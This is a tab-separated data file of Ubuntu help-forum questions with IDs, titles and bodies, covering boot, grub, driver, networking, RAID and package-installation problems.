403881	has the kernel panic 'd when ctrl-alt-f1/f2/ ... f7 do n't work anymore ?	i 'm trying to learn ( refresh , actually ) stuff about x and vt* etc . i was fooling around , and somehow screwed up , hit a black screen , and even the usual ctrl-alt-f1/f2/ ... f7 to get to a console did n't work anymore at all ( no reaction ) . first of all , is my understanding correct that ctrl-alt-f1/f2/ ... f7 is a `` kernel '' functionality ? as in , which code traps ctrl-alt-f1/f2/ ... f7 and.. does something about it ? if ctrl-alt-f1/f2/ ... f7 do n't work anymore , has the kernel panic 'd and you really have to reboot ? or would ssh in from another machine still have worked ( i had n't tried - and do n't know how to screw it up again.. ) is there another way to get a terminal to kill.. something to re-establish ctrl-alt-f1/f2/ ... f7 ( what ) ? this is just for learning - no actual real life problem . thanks !
403882	problem with `` rhythmbox-plugin-magnatune ''	i have problem with software installation on my ubuntu ( 12.04 ) . whenever i want use ubuntu software center popup show up with information that `` items can not be installed or removed ... '' and option cancel and repair ( repair not resolving problem ) . log is following installarchives ( ) failed : dpkg : dependency problems prevent configuration of rhythmbox-plugin-magnatune : rhythmbox-plugin-magnatune depends on rhythmbox ( = 2.96-0ubuntu4.2 ) ; however : version of rhythmbox on system is 2.96-0ubuntu4.3 . dpkg : error processing rhythmbox-plugin-magnatune ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : rhythmbox-plugin-magnatune error in function : dpkg : dependency problems prevent configuration of rhythmbox-plugin-magnatune : rhythmbox-plugin-magnatune depends on rhythmbox ( = 2.96-0ubuntu4.2 ) ; however : version of rhythmbox on system is 2.96-0ubuntu4.3 . dpkg : error processing rhythmbox-plugin-magnatune ( -- configure ) : dependency problems - leaving unconfigured i 've tried some solution like this : http : //ubuntuforums.org/showthread.php ? p=12093363 # post12093363 but still when im executing these commands error with rhythymbox plugin appear . dpkg : dependency problems prevent configuration of rhythmbox-plugin-magnatune : rhythmbox-plugin-magnatune depends on rhythmbox ( = 2.96-0ubuntu4.2 ) ; however : version of rhythmbox on system is 2.96-0ubuntu4.3 . this problem blocking me installing some required software , i will appreciate any help . thank you .
403883	data recovery with testdisk	i 'm trying to recover my data after a bad installation . on my laptop i had 2 partitions : windows and media . now i 'm trying to recover the content of the media partition and this is what the amazing testdisk has found : 2 media partitions . i do n't know which should be the next step and i 'm afraid to do experiments in order to no loose all my data from media partition .
403886	messed up ubuntu installation ?	first of all , i want to say that i 'm a real noob with ubuntu . i tried to `` downgrade '' to ubuntu 12.04 from 13.10 , in order to install a previous version of an application ( which is not even available on 12.04 ) ... when i was installing 12.04 , i could n't format the 13.10 partition alone , so i erased the whole installation ( with the /home ) and i got this : how can i fix this ?
403889	install ubuntu dualboot with android 4.1 on any tablet	can i install ubuntu dualboot with android 4.1 or 4.2 on asus memo pad 8 ?
403890	13.04 boot from livecd into graphical safe mode	i can boot into the livecd without any problems , but to use my machine without it crashing i need to boot it into graphic safe mode and then use the nvidia drivers . is it possible to boot into graphical safe mode with the livecd ?
403891	dolphin : any already-done sound customizations ?	like , obviously it should go `` iki-iki-iki '' and `` splash '' etc when you open folders and whatnot . i am absolutely 100 % sure that would remain amusing and not get old and annoying ever at all so has someone set up an easy one-click-install customization thinger for it ?
403892	how can i start nautilus on xubuntu / xfce via the shortcuts in the xfce panels ?	i am on xubuntu 13.10 and just installed and activated nautilus as the default file manager . i 'd like to use the current default file manager ( whichever that might be ) when i click on my panel shortcut to open any folder shortcut and so on . i want to try to avoid to re-define the shortcuts for the file manager . is that possible ?
403899	failed to run a bootable usb	edit : i tried to reinstall syslinux from `` misc options '' , and i get an error . mtools crashed using this command : mmove -d o -d o s : /ldlinux.sys s : /yumi/ldlinux.sys . this is what i 've done until now : attached my usb pen to pc downloaded gparted live iso from stable directory installed yumi for ubuntu , a program that allows you to create a bootable usb with multiple bootable isos run yumi.gambas from bash and entered my sudoer password selected the usb pen and the iso , and clicked `` create '' checked that an yumi directory on the pen exists rebooted pc pressed f8 at bios level and selected the pen result : usb bootloader was not started . on the contrary , my default bootloader started , and linux booted . no error message was displayed . is there a way to debug it ?
403902	problem with installing ms office 2010 on ubuntu 13.10 64-bit	i tried to install ms office 2010 on my ubuntu 13.10 in past 6 hours , but every single method that i used ended up unsuccessful . i used play on linux , but every time right after installing .net 2.0 wine crashed and i could n't install the ms office . my system is 64-bit but i was trying to install 32 bit office on 32 bit wine prefix . i 'll appreciate if anyone have a solution .
403903	additional drivers crashes in software properties	i 'm trying to use software properties ( software-properties-gtk ) to install nvidia drivers . when i open the additional drivers tab it just says `` searching for additional drivers ... '' and then apport comes up telling me ubuntu has had an internal error . the available additional drivers never show up , the list just stays empty . when i run software-properties-gtk from the terminal i get the following output right before the crash : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/gi/overrides/glib.py '' , line 634 , in < lambda > return ( lambda data : callback ( *data ) , user_data ) file `` /usr/lib/python3/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 1323 , in show_drivers ( overall_status , icon , drivers ) = self.gather_device_data ( self.devices [ device ] ) file `` /usr/lib/python3/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 1277 , in gather_device_data description = base_string.format ( base_description=description , licence=licence ) keyerror : 'license' is this a known bug ? can i fix it ?
403910	ubuntu server installation on ibm x3630 m4	we are trying to install ubuntu server on our new purchased ibm machine with below configuration , but hard disk is not displaying may be because of drivers are not available . two socket rack ibm server family : x3630 m4 processor : intel xeon e5 2420 ( six core ) max . processor : 2 clock speed : 1.9 cache memory : 15 mb fsb : 1333 mhz ram : 8 gb max . ram : 384 gb ( 12 slots ) hdd : 1 tb nl sas x 2nos . hdd bay : 8 optical : multi burner raid : 0 & 1 + 5 + battery can you please provide us the guidance , so we can successfully install ubuntu server on our new ibm machine . i would really appreciate your helpful response on this matter . thanks , haresh vachhani
403911	disk space is rapidly deplenishing	my disk space is rapidly getting eaten up and i do n't know why . i was using localhost and it was taking a long time to load so i checked the properties in the folder and i had 2gb left out of 125gb on my ssd . what is causing this error and how do i fix it ?
403918	setting cron to run a shell script : random wallpaper from a webpage	i have written a shell script which downloads random wallpaper from a web-page and sets it as a background every 5 hours . here is the script : # ! /bin/bash countervar=1 ; finish=0 ; cd /home/guinness/.rwallpaper/ if [ -f counter ] then countervar=`cat counter` fi for ( ( i= $ countervar ; c < =2000000 ; i++ ) ) do echo $ i > `` counter '' if [ ! -f wallpaper- $ i.jpg ] then wget `` http : //wallpapers.wallbase.cc/rozne/wallpaper- $ i.jpg '' if [ -f wallpaper- $ i.jpg ] then gsettings set org.gnome.desktop.background picture-uri `` file : ///home/guinness/.rwallpaper/wallpaper- $ i.jpg '' exit fi fi done if i run a this script it works like a charm . i use cron to run this every 5 hours . the problem , is that it runs every 5 hours and successfully downloads the next image but it does n't set it as a wallpaper . can anybody tell me what can be the problem ?
403919	allow users to access specified ips only	i have a computer that offers both a vpn and a ssh server running three ( separated ) vpn networks . all users log into the server via ssh . however , i want that only certain users can communicate to certain ips in the vpn networks . for example : user peter - > only 10.100.0.4 user chris - > only 10.100.0.5 user john - > only 10.200.0 . * user nick - > all ips ( 10.100.0 . * , 10.200.0 . * , the internet itself ) is this possible using ufw or iptables ? i have found no instructions how to do this user-specifically . edit : to be more precise : i want to restrict the connectivity of the users itself ( even if they are sitting at the pc and log in directly ) , so i doubt this is a problem that can be addressed ( only ) by sshd . tags : reinserted iptables , as ssh alone is not correct ...
403920	windows 8.1 repeatedly corrupts grub uefi boot manager	i am trying to get a dual boot windows 8.1 / ubuntu precise installation . my laptop is a sony svt1313z9es . it seems to have a buggy uefi implementation that always looks for efi/microsoft/boot/bootmgfw.efi regardless of the configured uefi boot manager . i have installed windows 8.1 and ubuntu and have both efi managers in my efi filesystem . after extensive reading i have tried replacing bootmgfw.efi -- and also the bootmanager in efi/boot -- with the grub boot manager , grubx64.efi . this works fine , until i boot windows from grub . windows boots fine , but then after shutting down for the first time i find the bootmanager has been damaged . it looks like windows 8.1 has tried to replace the grub boot manager with its own , and failed to write it somehow . the fat32 filesystem that contains the efi files is damaged . fsck.vfat reports free cluster summary wrong , and running md5sum on the efi file reports input/output error . all other files on the efi filesystem are undamaged , only the currently active boot manager is affected . fwiw , my efi partition is a 512mb gpt partition at the very end of the disk -- but with a lot of free space , around 450mb . could the partition being so close to the end of the drive cause any problems ? how can i prevent windows from messing up the boot manager in this way ?
403922	keyboard shortcut for thunar custom actions ?	is it possible to add keyboard shortcuts to thunars custom actions ? i tried setting the key with mouse-over ( the needed option is set in xfce settings ) but that do not work for me .
403926	is there any issues after upgrading native ubuntu 12.04 on dell xps 13 developer edition ?	i 've just bought dell xps 13 developer edition ( sputnik 3 ) . default version of ubuntu is 12.04 , and obviously i do n't want to stuck with almost 2 years old distribution . i just wandering is it save to upgrade to latest ( 13.10 ) ubuntu ? is there any know issues i supposed take under consideration before upgrading ? if so is there any know solutions for it .
403927	i loose the wifi connection close to the router	i have a weird problem and i have no idea what is going on . from my room the wifi works good but as soon as i put my laptop next to the router i loose the connection and can not reconnect . i have a virgin media router in the uk and i am using ubuntu 13.10 . with window it works fine . has anybody witnessed anything like this before ?
403928	how to install ubuntu touch on lg e617g optimus l5	i have been tinkering with my lg optimus l5 e617g and ca n't seem to find any good instructions on how to install ubuntu touch or even get to the bootloader to do so ... if anyone has any suggestions please help me out ? ? ? ?
403929	what is the meaning of this keyring-related error ?	it has been a while now since it all started and i 'm not sure what cause the window in the image bellow keeps popping up from time to time and i do n't know what to do about it , what could cause it and what it is its meaning . but i can tell that i have noticed it appears especially at start up , when i use terminal , when i use ubuntu one and when i wont to update software . usually , i ignore it , but i still do n't know what should i do : should i log into what ever that may be , or should i ignore it ? and anyhow , what should i make it stop appearing ? ( i can recall finding somewhere a `` solution '' for my problem : simply erase a certain file . i have tried and it worked , but i was afraid to do a permanent change thinking that , who knows ? maybe in the future i 'll need that file and then , what will i do ? bellow you can see the window i am talking about .
403930	rtnetlink answers : file exists ubuntu server 12.04	i am using ubuntu 12.04 , running in vmware . my /etc/network/interfaces file consists of : # the loopback network interface auto lo iface lo inet loopback # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.3.15 netmask 255.255.255.0 network 192.168.3.0 broadcast 192.168.3.255 gateway 192.168.3.254 dns-nameservers 8.8.8.8 auto eth1 iface eth1 inet static address 192.168.3.40 netmask 255.255.255.0 network 192.168.3.0 broadcast 192.168.3.255 gateway 192.168.3.15 dns-nameservers 192.168.1.15 i ran the command /etc/init.d/networking restart which returned this : *running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces *reconfiguring network interfaces ... rtnetlink answers : file exists failed to bring up eth1 [ ok ]
403935	not found library	i want to install gnupg but not found library : if i install next librarry : configure : error : libgpg-error is needed . see ftp : //ftp.gnupg.org/gcrypt/libgpg-error/ $ gpg-error -- version gpg-error ( libgpg-error ) 1.9 i using kubuntu .
403936	ssh : connect to host localhost port 22 : connection refused	although this has been discussed , but still i am not able to solve this . here is a quick review of what i did and how i got into the trouble : installed ubuntu 12.10 , installed ssh , sudo apt-get install ssh . the favorite ssh was working fine and connected by using ssh localhost . i removed ubuntu , increased the partition and again installed ubuntu . again i fired sudo apt-get install ssh , it showed me reading package lists ... done building dependency tree reading state information ... done when i given command , ssh localhost , it gave me error as : ssh : connect to host localhost port 22 : connection refused
403941	script to be run on wol ( wake on lan )	if you add @ reboot xyz to your crontab xyz will be run on every reboot . is there any way to run a script on wol ( wake on lan ) ? any tip is appreciated h책kan
403943	what 's mean `` identical to -e '' when i use this command : ps -a ?	i want to know what this mean . ps -a → select all processes . identical to -e. what 's mean `` identical to -e. '' ?
403950	e : the package lists or status file could not be parsed or opened	i have a problem with /var/lib/dpkg/status file . i will upload the link . before this i installed x-unikey but it failed so i enter /var/lib/dpkg/status and fix it again ( delete it ) . after i deleted it i ca n't install any package . here are what the terminal says : diamondburned @ diavilion : ~ $ sudo apt-get install mencoder [ sudo ] password for diamondburned : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/dpkg/status e : the package lists or status file could not be parsed or opened . you can download the file here to fix .
403951	printer wireless connection	i have a desktop pc running windows vista and networking via a bt wireless hub . the network includes a canon pixma mg6150 inkjet . my laptop is running ubuntu 12.04 . so far , i have been able to establish a wireless connection between laptop and hub , which works fine ( can get e-mails , etc . ) i have also established a wired connection between laptop and printer which works apart from one small glitch ( will only print from rear paper source , not cassette . ) i am now trying to set up a wireless link between laptop and printer . currently , i am following instructions in the book `` ubuntu made easy '' ( 12.04 version , ) by grant & bull . i can step through the instructions to the smb browser box , which recognises the presence of my bt hub and the desktop pc . however , when i try browsing to get the printer identity for the smb the system searches for a while and then stops , with no result . i have checked the network devices on the desktop and the printer is definitely there and showing a wireless connection to the pc . can anyone offer any suggestions , please ?
403958	re-configure grub to directly boot to ubuntu on dual-boot	i 'm curently dual-booting between windows 7 and ubuntu 13.10 both are 32-bit i 'm installing it on a hdd with ubuntu bootloader installed on an external pendrive ( so if i want to boot ubuntu i must load the bootloader from the pendrive ) .and it works my problem is , since i 'm installed it on a pc which already has an os , the installer install the grub for dual-booting and it always show grub menu that ask me to choose which os i want to load ( but it only appear when i 'm boot from the pendrive ) what i 'm trying to do is make my grub bootloader to boot directly to ubuntu without showing grub menu.i 've followed guide from here but my grub menu still appear here is what contained on /etc/default/grub # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=0 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' what i 've tried -do as guided -set default to ubuntu by run sudo grub-set-default ubuntu but those all seems do nothing and my grub menu is still appearing am i missing something ? does implemetation of the linked guide is diffrent for bootloader installed on external drive ? thankyou
403961	usb/dvd wont be recognized in order to boot them	today after a lot of reading i decided to dual-boot ubuntu 12.04 lts alongside with windows 8 and to be honest i stucked in a step that i did n't expect to . bios wont recognize neither usb nor dvd in order to boot from them . md5sum of .iso file matches . also i can boot it in virtual box . i burned two different dvds and two times the usb but nothing . secure boot and fast startup are disabled . i have burned a dvd with linux mint mate , it is recognized and it boots normally . i really do n't know what 's going wrong ... any idea/suggestion/help will be appreciated . thanks .
403963	`` something else '' settings ( partitions , bios area , locations ... ) - what am i missing ?	i have lots of windows experience , but zero linux/ubuntu , so thought i 'd try installing ubuntu . i 'm attempting to install ubuntu 13.10 on a harddrive with a lot of files ( no os , 1 simple basic primary partition ) . i use windows 7 disk management ( current os on a different hdd ) to shrink the volume and create 50 gb of unallocated space where i want to install ubuntu . my mobo does not have efi ( http : //ca.gigabyte.com/products/product-page.aspx ? pid=3765 # sp ) i then disconnect my win 7 hdd ( ensuring i do n't break anything ) so only the single hdd with the 50gb free is hooked up and boot from usb and start the ubuntu installation , choosing `` something else '' . this is where i am now unsure how to go about things . i create a 40 gb ext4 and mount `` / '' as 'primary ' and at beginning of 50 gb space . i then create a 10 gb `` swap '' after that , finally followed by 5 mb of `` reserved bios boot area '' and then `` install '' . device for boot loader i put in /dev/sda ( highest entry on the list ) . installer goes through the motions , tells me it needs to restart - machine restarts and stops at `` loading operating system '' and just sits there : ( i confirmed in bios that it should be booting from the hdd . if i hook my win 7 hdd back up and boot into it and use easybcd for `` grub 2 '' automatic it finds the ubuntu and adds it to the boot list . now when i boot ( win 7 hdd ) i see the ubuntu option - if i select it i end up in some kind of grub command line interface and not ubuntu desktop . i 'm guessing there 's something wrong with my partitions . or the device for boot loader is in the wrong place ? i also assumed i could avoid dual boot problems by having ubuntu entirely on this hdd , and then just choose that hdd from bios when i want ubuntu . then maybe advance to having it as an option in boot later . i 'm game to fix what i have , or use win 7 disk management to scrub the ubuntu partitions and start over . update1 : hdd i am installing to is gpt ( it 's 3tb total ) . update2 : boot-info results - http : //paste.ubuntu.com/6748189/ update3 : screw it . i hooked up an old hdd and just installed ubuntu by itself onto it . then i used easybcd in win 7 to give me the ubuntu option at start up . working now - now lots to explore : )
403964	installation of matlab 2013a in 13.10 trouble	i 've been looking around for solutions to this and ca n't really seem to find a good answer so i thought i 'd try this . i 'm trying to install matlab 2013a on saucy salamander . i have all the files already downloaded and extracted to my desktop . the installation files are for linux 64 bit . this is what i 'm doing and getting on the terminal ( keep in mind i 'm completely new to linux and ubuntu ) : sudo ~/desktop/matlab/install -v [ sudo ] password : sudo : /home/ ( myname ) /desktop/matlab/install : command not found i tried doing things differently by moving the matlab folder to a different location ( i.e . downloads ) and trying this : cd ~/downloads/matlab sudo ./install [ sudo ] password : sudo : /home/ ( myname ) /downloads/matlab/install : command not found if you guys know a better solution/what i 'm doing wrong ... please let me know ! ! ! thanks for the help . update ! solved . alright ! after doing a little bit of digging , i figured out how to do it ! here 's the step by step method to ( hopefully ) solve the issue for anyone having the same problems : if you have the .tar.gz file for matlab , be sure to right click it and extract it to folder ( i did this in ~/downloads ) . open terminal and type the following : cd ~/downloads/ ( matlabfolder ) sudo chmod +x ./install sudo ./install you will get an error that says : eval:1 : /tmp/mathworks_6114/sys/java/jre/glnxa86/jre/bin/java : permission denied then , navigate to that directory and do the following : cd ~/downloads/ ( matlabfolder ) /sys/java/jre/glnxa86/jre/bin sudo chmod +x ./java then , go back to the install directory that you went to initially : cd ~/downloads/ ( matlabfolder ) sudo ./install that should launch the matlab installer ! if you find my instructions unclear , this is where i got my info ! for those who are wondering , i think that the chmod +x function basically makes the file you specify to be executable . hope this helped !
403965	gpu overheating with the open source radeon driver	i recently installed ubuntu 13.10 on my desktop and would really like to keep using the open source drivers for my radeonhd 6970 graphics card . however , during boot and after startup , the gpu temperature immediately gets hot and hovers around 76â°c ( with a fan blowing loudly ) the fglrx driver does not have this problem , but i donâ´t want to use that for other reasons . is there a way to configure or fix the radeon open source driver so the temperature stays low until i actually start heavily using the gpu performance ? my experience with ubuntu/linux is limited , so please explain any solution very carefully .
403967	how to set up squid proxy to use 2 interfaces	i can reach internet by two ways : my pc -- > home network -- > internet my pc -- > proxy laptop -- > other wifi point -- > internet can anyone tell me how to configure proxy laptop to work as local proxy to access the internet ? i also would like to point out that proxy laptop uses 2 interfaces - lan cable and wlan0 interface . i 've heard it is possible to do using software squid but in the google seems no info : ( even on windows 7 i did n't find any info how to make it work : / does anyone know how to configure squid proxy ? i do n't care if it 's on windows xp , windows 7 , ubuntu , or any other linux distro
403968	mounting ntfs truecrypt volume in ubuntu with certain permissions	i have mounted a truecrypt volume and i am able to read to it fine . what i want to do is to be able to give full access to the drive . when i tried as root to chmod -r 777 /mountpoint , it runs ok . but then when i check the permissions , nothing has changed . has anyone run into this ? is there a way that i should be mounting it initially with higher permissions ?
403970	touchpad scrolling not working	i have a dell 5720 ( inspiron 17r ) , with a distro based up on ubuntu 12.04 . my scrolling does n't work . when i set it to scroll with two fingers , the setting backs to disabled when i open the window again . i 've installed a program `` synaptics '' but nothing happens and i do n't know how to set this up . also , the output of `` xinput '' is this ( looks like my system sees my touchpad as a mouse ) : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ mlk 2.4g laser mouse id=11 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sleep button id=10 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=12 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=15 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ]
403973	how to access the root account home folder ?	i want to access the root account home folder to delete some files because when i logging to ubuntu 12.04 it says that no enough memory to write after typing the password . but i can log into guest user account . to get the memory how can i delete the file from guest user account ? ( i have the root password because i 'm the root ) .
403977	should advent torino x700 work with ubuntu	i have previously asked a question asking if ubuntu works on the device ( ubuntu on advent torino x700 ) , but no one seems to have tried it , advent will not try it for me , and i have no local shop where i can try it , i have no choice but to ask 'should it work ' . i said previously : i am intested in buying the advent torino x700 . i do not like windows 8 and i already use ubuntu so i would want to install ubuntu desktop onto it . as no one as tried ubuntu on it , advent wo n't tell me and i can not test it myself , is there anything about its hardware that will prevent ubuntu from working on it ? here is hardware info : http : //www.currys.co.uk/gbuk/computing/laptops/laptops/advent-torino-x700-15-6-laptop-21646965-pdt.html # longdesc does all the mention hardware work with ubuntu ? will i need any drivers for things like integrated speakers or wifi ? is there anything that jumps out that wo n't work with ubuntu ? i guess if you think it 'll work with ubuntu , i 'll get it , and if it does n't work , i 'll have to return it .
403987	dual boot windows 8 and ubuntu 13.10 . where to put the grub	can anyone help me with getting this to work ? i have two physical ssd drives ( samsung and kingston ) - on the samsung one i have windows 8 installed , kingston is free and formatted and it 's dedicated to ubuntu 13.10 . i tried a whole bunch of youtube guides on how to install both oss , but did n't find what i need . is it possible at all to install ubuntu on a completely different physical drive ( which has got nothing to do with the drive where windows is already installed ) and to make the system prompt me to choose between windows and ubuntu ? i tried installing the grub loader on to the samsung drive and ubuntu files on to kingston drive and nothing happens , system just redirects me to windows and never asks what os to be chosen .
403989	ca n't get any of the oss to boot after installing ubuntu	i installed the latest version of ubuntu on my sony vaio e series machine which came with win8 64 bit pre-installed.i recently updated to 8.1 though . since the machine comes with secure boot and uefi , i disabled secure boot , changed uefi to legacy mode . to install ubuntu i used a live usb . i created a partition for installing ubuntu , formatted it to ext4 , created another tiny partition to use it as bios code area , installed ubuntu on the partition ( the first one of course ) with mount point / . after installation was successful i restarted the machine . it booted into live usb again . i installed boot repair , ran it using the recommended settings . after the repair was successful it told me not to forget to change bios boot on sda3/efi/ubuntu/shimx64.efi . now i do n't now exactly what that means . so i rebooted the system , went into bios , enabled secure boot and boot mode to uefi again ( opposed to legacy ) . but now when i boot the system after detaching the live usb , it shows a message that operating system is unavailable . i disabled secure boot and changed to legacy mode again . now the screen get 's stuck in the initial vaio logo . now i think the issue was with not changing bios boot on shimx64.efi . but being this my first time with linux , i do n't know what that means . also it might be something else ? i tried searching for a solution but was unable to find anything useful.i have now restored my efi files with boot repair and am able to boot into windows . but could n't get ubuntu to load anyways : ( here is pastebin : paste.ubuntu.com/6732864/
403990	unable to mount raid 5 array	let me begin by saying i am a complete beginner using ubuntu , but i 'll try to give as much information as possible . i created a raid 5 array and formatted it with mke2fs . i was able to mount the image and move over all my media and set up plex media server . all of a sudden i am unable to mount or even find this image anymore . usually i 'd be able to find it in /media/library but there is n't anything there . here are some of my debugging outputs : jflatle @ htpc : /media/library $ sudo mdadm -- examine -- scan array /dev/md/0 metadata=1.2 uuid=e2470907 : d21cc960:32ede89c:035c5fd1 name=htpc:0 jflatle @ htpc : /media/library $ cat /proc/partitions major minor # blocks name 8 0 58615704 sda 8 1 248832 sda1 8 2 1 sda2 8 5 58363904 sda5 8 16 1953514584 sdb 8 17 1953513472 sdb1 8 32 1953514584 sdc 8 33 1953513472 sdc1 8 48 1953514584 sdd 8 49 1953513472 sdd1 8 64 1953514584 sde 8 65 1953513472 sde1 252 0 54435840 dm-0 252 1 3923968 dm-1 8 80 1953514584 sdf 8 81 1953513472 sdf1 8 96 1953514584 sdg 8 97 1953513472 sdg1 jflatle @ htpc : /media/library $ cat /etc/mdadm/mdadm.conf array /dev/md0 metadata=1.2 spares=1 name=htpc:0 uuid=e2470907 : d21cc960:32ede89c:035c5fd1 array /dev/md0 metadata=1.2 name=htpc:0 uuid=e2470907 : d21cc960:32ede89c:035c5fd1 jflatle @ htpc : /media/library $ sudo /proc/mdstat sudo : /proc/mdstat : command not found jflatle @ htpc : /media/library $ sudo cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] unused devices : < none > jflatle @ htpc : /media/library $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu -- vg-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=81aaaa17-cb13-408f-bc44-1ac4fc4749a4 /boot ext2 defaults 0 2 /dev/mapper/ubuntu -- vg-swap_1 none swap sw 0 0 # /dev/md127p1 uuid=8b8f42f4-0f07-4182-9152-3e70c3173d5b /media/library auto defaults 0 2 system setup : ubuntu 3.10 memory 3.6 gib processor intel® core™ i3 cpu 530 @ 2.93ghz × 4 graphics intel® ironlake desktop os type 64-bit disk 55.0 gb
403993	how to sync keepass2 using scp/ssh ?	i want to access/save my keydb using keepass2 on a ssh server . on windows , it is available through ioprotocolext plugin ( which contains winscp portable executable ) . http : //keepass.info/help/v2/ioconnect.html but nothing for unix/linux as far as i know . does anyone have a clue on how to achieve this ? thanks
403994	how to resize an encrypted llvm volume and configure it to install another linux distribution alongside ubuntu ?	i chose to install ubuntu with a fully encrypted disk , using llvm . how can i resize my partition so that i can install a new linux version alongside ubuntu ? here 's my current gparted status , this is the ubuntu default : i have already seen the following question : how can i resize an lvm partition ? ( i.e : physical volume ) however , that is not about resizing an encrypted partition , but it only talks about the standard llvm volume . also , it does not talk about installing the os after resizing partitions . can i just use the same /boot partition ? how do i configure this ?
404001	all display managers boot into gnome classic ( no effects )	i 've tried both gdm and lightgdm but no matter what i do , i get logged in to gnome classic ( no effects ) . the terminal 's transparency is a nuisance here and i completely do not want to work on anything until things start looking pretty back again . please help me or i will kill myself . i just want to be able to use the proper gnome shell when i select it .
404005	how to customize boot animation in ubuntu 13.04 ?	i want to change my boot animation into a video instead of ubuntu with 5 dot . is there any way to do that ?
404007	hdmi output not working after install	i 've installed ubuntu 13.10 on my hp envy 17 . i have a intel graphic chip and a nvidia chip . geforce gt 740m ) . but after installing it the hdmi monitor is n't detected anymore . installing the corresponding nvidia drivers ( i tried nvidia-319 , nvidia-updates-319 or nvidia-current ) lead to low resolution and compiz being unable to start . but while installing i get the hdmi monitor as second screen . how could i enable that again ?
404008	driver bluetooth asus x45a	does someone know how to operate bluetooth on an asus notebook x45a ? buenas alguien sabe como hacer funcionar el bluetooth de una notebook asus x45a ? muchas gracias
404010	why does synapse use nautilus for all file types instead of the default application ?	no matter which file i find via synapse , it just gets opened in nautilus . may that be because i recently put nautilus as my default file manager ? can i change that behavior to the normal action , i.e . an .ods file gets opened with libreoffice calc , .txt with mousepad ... and so on ? additional information : i am running xubuntu 13.10 .
404013	intel graphics driver for intel gma 3650 on 12.04	i just obtained a small computer from asus with ubuntu pre-installed . the scrolling , video , and animations are sluggish and choppy , though . the details from all settings states that the driver in use is `` gallium 0.4 on llvmpipe ( llvm 0x300 ) '' . however , the additional drivers claims that the driver in use is `` drm driver for the intel gma500 '' . i think that the computer is using the wrong driver , which could account for the choppiness in the scrolling and video . how can i correct this ? computer specs : 2gb ram , 4x1.86ghz intel atom processor , intel gma 3650 gpu
404020	how to change the time after which i have to type my password again ?	when i am logged in to ubuntu 13.10 ( unity i guess ) and nothing happens , the screen gets black . i am not logged out , but i need to type the password to be able to 'do ' something again . how can i change this time ? if this is related to screensaver settings , i neither can find them in the system settings , nor in the application list , nor in the whitly thing on the upper left ( dashboard ) ? so how to change this timeout after which the screen gets black and i am asked for the password again ( after mouse movement etc ) .
404023	is there anything analoguos to task manager ? ( kill specific programs )	so when my ubuntu freezes , is there a way i could kill only some programs not all of them ?
404024	difference between gnome-desktop-item-edit and desktop-file-edit	what is the difference between the commands gnome-desktop-item-edit and desktop-file-edit ? do they create files with different syntax ? which one should i use on ubuntu unity ?
404025	different ip address resolved to my host name	i have registered with no-ip site with a host name to a local lan ip address of one of my devices connected in wifi whose ip is forwarded ( port ) from my router . i have an android application 'update no-ip ' which updates my dynamic ip . now the problem is , when i find the public ip address through the browser ( gooling what is my ip ) , it shows a different one not the one i had got through the android app . for example , the browser gives 'your address is 59.96.220.9 ' whereas my android app gives '117.230.236.69 ' . where are the things going wrong ? ... .does the solution lead to remote and public ip concepts ? thanking you ,
404028	is it necessary to have a firewall in ubuntu ?	i was wondering if a firewall could give some more security , and if yes which one would you recommend .
404029	ca n't use empathy	i 'm on ubuntu 13.10 , and i 'm trying to use the default messenger empathy for connecting to gtalk . my problem is that on-line accounts is not working , any time i click on the google account option for authorization , it just opens and closes a window , and does nothing . any help ?
